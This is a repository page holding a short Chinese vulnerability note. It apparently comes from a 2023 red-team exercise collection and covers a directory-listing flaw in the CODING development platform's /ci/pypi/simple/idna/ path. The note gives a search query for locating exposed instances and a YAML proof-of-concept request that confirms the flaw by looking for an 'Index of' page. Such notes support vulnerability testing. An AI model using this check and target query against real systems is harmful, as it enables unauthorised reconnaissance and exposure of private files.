admin/2023Hvv
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
2023Hvv/CODING平台idna目录存在目录遍历漏洞.md
ibaiw bfa937ddb6 add
2023-08-16 17:47:36 +08:00

20 lines
553 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

CODing.net是一个面向开发者的云端开发平台提供 Git/SVN 代码托管、任务管理在idna存在目录泄露漏洞攻击者可获取目录文件信息。
检索条件: title="一站式软件研发管理平台"
poc
```
relative: req0
session: false
requests:
- method: GET
timeout: 10
path: /ci/pypi/simple/idna/
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.2786.81 Safari/537.36
follow_redirects: true
matches: (code.eq("200") && body.contains("Index of"))
```
Reference in New Issue View Git Blame Copy Permalink